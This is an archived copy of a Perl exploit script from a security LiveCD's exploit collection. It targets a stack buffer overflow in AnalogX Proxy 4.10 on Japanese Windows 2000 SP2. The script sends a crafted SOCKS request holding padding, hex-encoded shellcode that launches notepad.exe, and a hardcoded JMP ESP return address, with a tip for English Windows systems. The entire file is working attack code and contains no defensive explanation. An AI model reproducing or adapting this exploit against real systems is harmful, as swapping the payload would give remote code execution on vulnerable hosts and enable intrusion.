home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / proxy / analog-x / analog-x-proxyex.pl < prev    next >
Perl Script  |  2005-02-12  |  1KB  |  43 lines

  1. #!/usr/local/bin/perl
  2.  
  3. #-----------------------------------------------------------
  4. # AnalogX Proxy Version 4.10 exploit for Japanese Windows 2000 Pro (SP2)
  5. # written by Kanatoko <anvil@jumperz.net>
  6. # http://www.jumperz.net/
  7. # thanx to: hsj (http://hsj.shadowpenguin.org/)
  8. #-----------------------------------------------------------
  9. use Socket;
  10.  
  11. $connect_host = "socks.example.com";
  12. $port = 1080;
  13. $iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
  14. $sock_addr = pack_sockaddr_in($port,$iaddr);
  15. socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
  16. connect(SOCKET,$sock_addr) || die "Connect Error\n";
  17. select(SOCKET); $|=1; select(STDOUT);
  18.  
  19.         # egg written by UNYUN (http://www.shadowpenguin.org/)
  20.         # 57bytes
  21. $egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
  22. $egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
  23. $egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
  24. $egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
  25. $egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
  26. $egg .= "notepad.exe";
  27.  
  28. $buf  = "\x04\x01\x00\x19\x00\x00\x00\x01";
  29. $buf .= "A" x 32;
  30. $buf .= $egg;
  31. $buf .= "\x00";
  32. $buf .= "A" x 144;
  33.  
  34.         # JMP ESP in user32.dll( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
  35.         # If you use English Windows 2000, try 0x77E2492B
  36. $buf .= "\x2B\x49\xdf\x77";
  37.  
  38.         # JMP +0x22
  39. $buf .= "\xEB\x22";
  40. $buf .= "\x00";
  41.  
  42. print SOCKET $buf;
  43.